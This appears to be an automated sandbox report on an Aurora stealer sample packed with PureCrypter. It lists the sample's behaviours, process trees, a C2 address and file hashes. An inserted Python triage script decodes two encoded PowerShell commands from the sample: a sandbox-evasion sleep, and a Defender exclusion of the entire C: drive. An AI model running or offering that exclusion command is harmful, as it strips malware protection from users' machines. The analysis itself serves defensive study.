Analysis Overview
SHA256
471d501162e2a5cb6aab3f4f5362ff843d05ef9f20d9fd7ea29733d3a9875747
Threat Level: Known bad
The file 5e243f79ecb539d0d1f75fce7ddfedeccee70a48 was found to be: Known bad.
Malicious Activity Summary
Aurora
Detect PureCrypter injector
PureCrypter
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-05 13:25
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-05 13:25
Reported
2023-02-05 13:27
Platform
win10v2004-20220812-en
Max time kernel
68s
Max time network
129s
Command Line
Signatures
Aurora
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2664 set thread context of 3956 | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
Network
| Country | Destination | Domain | Proto |
| DE | 45.9.74.11:8081 | | tcp |
| BE | 8.238.111.126:80 | | tcp |
| BE | 8.238.111.126:80 | | tcp |
Files
memory/4912-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | b8d81a3b130377669b4929993b339ec8 |
| SHA1 | c5b57971584e06dedb521de936de257815fe7a29 |
| SHA256 | e7ee343aff03b95779eec8da0be8f1341b66008b9c60281a4705ece8b53c218e |
| SHA512 | 3bde4b4bf4dc33c188a079eb4f91818bda2bae10b5ebcd620d29295538d54a6caeb9e254e47a561d15091abeb25b840d55572f1cc4e26f1cc6bc2160eb3e23a7 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | a86784bb28a698ef02243ed88082097f |
| SHA1 | c6b13e845cc72789f5a7a3c5dc1113b4bfae5f70 |
| SHA256 | 9dab7f8bfad9ab41b2791aa512e7b42f3f9dde29227a2e23d7b5c4f4ec4415ac |
| SHA512 | dc1fccdb963b8aef6f34ebf3a7ba32ed1d55e8bfda03f9092b34cf67c7ffc9869622e85da1aadd360563bdd8bd9c1f43538c8d1715777da08ecb3f3fb5f0cd16 |
memory/2664-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 2a1480975d44941fbd70d4c924d045cf |
| SHA1 | cfa9a2c91eb8fa7056413e717211485dbdef1f70 |
| SHA256 | e7a83ed58b5ce694665b2a8e5cc617ea9c85fd382fd0172da54abf2db3162e99 |
| SHA512 | 7f64ea63f96f9753d4c3f913745c95f146c948461790fd6e6f0b8e8ebed0003267fca9b46e37b1e50b96d63832ac5e21adbc50b94c3079064a4c77f713d75a3f |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 3ccae81ac10a8cbfb364c130aa781dd0 |
| SHA1 | 6437406c7c8c9e17e0a9950dee7a4bf6fadc6031 |
| SHA256 | 1b090f4693d568813c0f7144a39888178d33694d889347c7cf4bce17996a2399 |
| SHA512 | 2d1eee891d19c60812617b903389d1a69862a8dd5f5e2c74a8b3ada147a3fda0ecc234e8367de7ac39237e69ae2beb61ac735eaf5479832ac56035123658b61a |
memory/2664-138-0x0000000000860000-0x0000000000FD4000-memory.dmp
memory/2664-139-0x0000000006F20000-0x0000000006F42000-memory.dmp
memory/1568-140-0x0000000000000000-mapping.dmp
memory/1568-141-0x0000000002CF0000-0x0000000002D26000-memory.dmp
memory/1568-142-0x0000000005440000-0x0000000005A68000-memory.dmp
memory/1568-143-0x0000000005BE0000-0x0000000005C46000-memory.dmp
memory/1568-144-0x0000000005CC0000-0x0000000005D26000-memory.dmp
memory/1568-145-0x00000000062D0000-0x00000000062EE000-memory.dmp
memory/1568-146-0x0000000007920000-0x0000000007F9A000-memory.dmp
memory/1568-147-0x00000000067E0000-0x00000000067FA000-memory.dmp
memory/2192-148-0x0000000000000000-mapping.dmp
memory/3868-149-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | d6bc392b638c44f60681982b871fcb3b |
| SHA1 | 8c06041dd7c2894f850c522a3a126838b3ec87e4 |
| SHA256 | d1d7fb67c24395e0f6fbde3a4009881a8e9ebd2ed5d4a0f89713bd08cd294153 |
| SHA512 | 6020e4c0101a5f7d5744eaf4a793a768a3afe3b0ed12b4e8b99d057f7bc84e47e1f8767e800aa9e827c34bac0e389e13c5d4a3d774aa005a5316dedd1a809d03 |
memory/3956-153-0x0000000000000000-mapping.dmp
memory/3876-150-0x0000000000000000-mapping.dmp
memory/3956-154-0x0000000000400000-0x0000000000731000-memory.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 91bc4c5762c068b279a5df98f01348f6 |
| SHA1 | bad0ce46214ef25223a14fdcc25a3290be5d7639 |
| SHA256 | 6a413febe4f1ead04488ae7bd601cfcc9993b0213c20d1d4e300cf95ed064f2a |
| SHA512 | 759250bac905336f3a832bdfc3848d85c283981264ff712701304c457c3521b0f2926d0755756a22939048c777f464baeb80aa72da7e28dc4dd0e4d09f8d25fa |
memory/3956-157-0x0000000000400000-0x0000000000731000-memory.dmp
memory/3956-158-0x0000000000400000-0x0000000000731000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8ca0bc3be3325c957199884413460f07 |
| SHA1 | b722b745a11eeb9729af5166bf1bfa615c977e34 |
| SHA256 | 60ab170c1d131d51d72db43ca9d4beb6b00076625c00826f97aaf4fe6b3ed51a |
| SHA512 | cccd4feeb4129232f3a118a014ed7a9750fe5551b5e2df5c34b04733c923e2c014fc2659c529417c523bb8a4da8d7fccc700bad4d84ab2430eb03b9a552f1376 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |
memory/3868-162-0x0000000007530000-0x0000000007562000-memory.dmp
memory/2304-161-0x0000000000000000-mapping.dmp
memory/3868-163-0x0000000072470000-0x00000000724BC000-memory.dmp
memory/3868-164-0x0000000006AD0000-0x0000000006AEE000-memory.dmp
memory/3868-165-0x00000000078F0000-0x00000000078FA000-memory.dmp
memory/1192-166-0x0000000000000000-mapping.dmp
memory/4060-167-0x0000000000000000-mapping.dmp
memory/3868-168-0x0000000007B30000-0x0000000007BC6000-memory.dmp
memory/1412-169-0x0000000000000000-mapping.dmp
memory/4964-170-0x0000000000000000-mapping.dmp
memory/3868-171-0x00000000063A0000-0x00000000063AE000-memory.dmp
memory/3868-172-0x0000000007A90000-0x0000000007AAA000-memory.dmp
memory/3868-173-0x0000000007A70000-0x0000000007A78000-memory.dmp
memory/3956-174-0x0000000000400000-0x0000000000731000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-05 13:25
Reported
2023-02-05 13:27
Platform
win7-20220901-en
Max time kernel
60s
Max time network
48s
Command Line
Signatures
Detect PureCrypter injector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
PureCrypter
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
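The process lists of both detonations (behavioral2 and behavioral1 above) show two PowerShell invocations whose argument is passed with `-ENC`, i.e. base64 over UTF-16LE text, so the report does not show what they do. The snippet below is an added example, not part of the sandbox report: it decodes the two arguments exactly as they appear on the page, flags the decoded text with two hypothetical triage rules (a Defender exclusion for `C:\`, and a sleep used to outlast short detonation windows), and separately recognises the `wextract_cleanup0` RunOnce value from the "Adds Run key to start application" signature as the standard WExtract/IExpress self-extractor cleanup entry (it deletes the `IXP000.TMP` extraction directory at next logon) rather than payload persistence. Rule names, the `triage` helper and the `REPORT_*` constants are mine; the command lines and registry value inside them are copied verbatim from the report.

```python
"""Decode and triage PowerShell -ENC arguments and the WExtract RunOnce value
seen in the sandbox report (added example; not sandbox output)."""
import base64
import re
from typing import Dict, List, Optional

# Command lines copied verbatim from the behavioral2 / behavioral1 process lists.
REPORT_CMDLINES = [
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '-ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==',
    '"C:\\Windows\\System32\\cmd.exe" /c powershell '
    '-ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==',
    'wmic os get Caption',  # no -ENC argument; must come back unflagged
]

# RunOnce value copied from the "Adds Run key to start application" signature.
REPORT_RUNONCE_VALUE = (
    'rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\"'
)

# powershell accepts -e, -ec, -enc and -encodedcommand (case-insensitive).
ENC_ARG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

# Hypothetical triage rules (mine, not the sandbox's): name -> pattern over decoded text.
RULES = [
    ("defender_exclusion", re.compile(r"\bset-mppreference\b.*-exclusionpath", re.I)),
    ("sleep_delay", re.compile(r"\bstart-sleep\b", re.I)),
]

# WExtract/IExpress SFX packages register this to delete their IXP###.TMP dir.
WEXTRACT_CLEANUP = re.compile(r"advpack\.dll,DelNodeRunDLL32\b.*\\IXP\d{3}\.TMP", re.I)


def decode_enc(arg: str) -> str:
    """-EncodedCommand is base64 of UTF-16LE text; drop a stray NUL terminator if present."""
    return base64.b64decode(arg).decode("utf-16-le").rstrip("\x00")


def extract_encoded(cmdline: str) -> Optional[str]:
    """Return the base64 argument of a -ENC style switch, or None if the line has none."""
    m = ENC_ARG.search(cmdline)
    return m.group(1) if m else None


def classify(decoded: str) -> List[str]:
    """Names of the RULES that match the decoded PowerShell text."""
    return [name for name, pat in RULES if pat.search(decoded)]


def triage(cmdline: str) -> Dict[str, object]:
    """Decode one process command line and attach rule hits; non-encoded lines pass through."""
    enc = extract_encoded(cmdline)
    decoded = decode_enc(enc) if enc else None
    return {
        "encoded": enc is not None,
        "decoded": decoded,
        "flags": classify(decoded) if decoded else [],
    }


def is_wextract_cleanup(value: str) -> bool:
    """True for the RunOnce cleanup entry a WExtract SFX writes; it is not payload persistence."""
    return bool(WEXTRACT_CLEANUP.search(value))


if __name__ == "__main__":
    for line in REPORT_CMDLINES:
        print(triage(line))
    print("RunOnce value is SFX cleanup:", is_wextract_cleanup(REPORT_RUNONCE_VALUE))
```

Decoded, the first argument is `start-sleep -seconds 35` and the second is `set-mppreference -exclusionpath C:\`, which excludes the entire system drive from Microsoft Defender scanning before the later `voiceadequovl.exe` stages run. Note that the cleanup rule only says the RunOnce entry itself is the self-extractor's housekeeping; the dropped copy under `AppData\Roaming\Voice` is still the artifact to hunt for.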
Network
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | b16645eba125598b5ccd3d2f374c0e58 |
| SHA1 | d83f019f32c5061f2a6cfe0191cf2b1033d35ba9 |
| SHA256 | afbde4bc1a55956a07fe46dbd46232a6d7b24cddf3c305463b8300b2443d113c |
| SHA512 | 7d64eda1068f971319605adafba4941c15e313c808b01fdddb340e1d17aa8f22b57eed879b874e61f954115e22292341c7a71981e199a214dfbb132b57b872ae |
memory/1104-54-0x0000000000000000-mapping.dmp
memory/1104-56-0x0000000075A71000-0x0000000075A73000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | 6b76a01acb3153e8ba6992946c57304d |
| SHA1 | fcc3c1e9b59a45c3257ff955ffc8c9866155bcca |
| SHA256 | c20e834704e463b44106ca5719c719ca357d54723ca0cada70d9a0119f88a022 |
| SHA512 | 58e8d64fbbbede50a7f8f486bb49106f355727c90cc7d125b117ad2f28990855a6caf7811669726f7ab6496725d921fb8c4dd3f3b8cbc75e7c9f17865e7a0588 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
